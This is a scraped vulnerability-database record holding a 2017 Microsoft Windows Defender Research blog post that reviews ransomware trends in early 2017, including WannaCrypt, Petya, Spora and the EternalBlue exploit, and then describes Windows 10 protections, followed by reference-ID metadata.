Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig6-Windows-10-next-gen-ransomware-protection.png)\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-08T08:23:33", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SMNTC-96705", "SMNTC-96704"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["CVE-2017-0144", "CVE-2017-0145"], "type": "cve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": 
["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-09-08T08:23:33", "rev": 2, "value": 7.7, "vector": "NONE"}}, "hash": "ec9864a9b2ef309100460e3e38b6c3708b1a375009fa5ff29398055f8354820c", "hashmap": [{"hash": "9eea897e5b35094c8bed9578fb2d92a2", "key": "description"}, {"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7c7b135cc6d4ac94a96416aa570dd63d", "key": "href"}, {"hash": "be27874259dfa96aff4b2c923f582319", "key": "published"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "2ed33d64012a372c3bd45d454ea4fb3b", "key": "cvelist"}, {"hash": "be27874259dfa96aff4b2c923f582319", "key": 
"modified"}, {"hash": "3791d2f219ef1795e98280aa7ad719e4", "key": "title"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "immutableFields": [], "lastseen": "2017-09-08T08:23:33", "modified": "2017-09-06T14:58:36", "objectVersion": "1.5", "published": "2017-09-06T14:58:36", "references": [], "reporter": "msft-mmpc", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "viewCount": 617}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-08T08:23:33"}], "modified": "2017-09-06T14:58:36", "lastseen": "2017-09-08T08:23:33", "published": "2017-09-06T14:58:36", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. 
The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig3-ransomware-encounters-global-map.gif)\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig1-monthly-ransomware-encounters.png)\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. 
In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig2-trends-ransomware-families.png)\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). 
While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. 
Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. 
Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). 
In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it accomplishes either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions open across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. 
Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom paid in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig4-petya-kill-chain.png)\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. 
As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig5-Windows-10-end-to-end-protection-stack.png)\n\n_Figure 5. 
Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including Control Flow Guard for the kernel (kCFG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. 
In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. 
[Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. 
Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig6-Windows-10-next-gen-ransomware-protection.png)\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 626, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "fireeye", "idList": 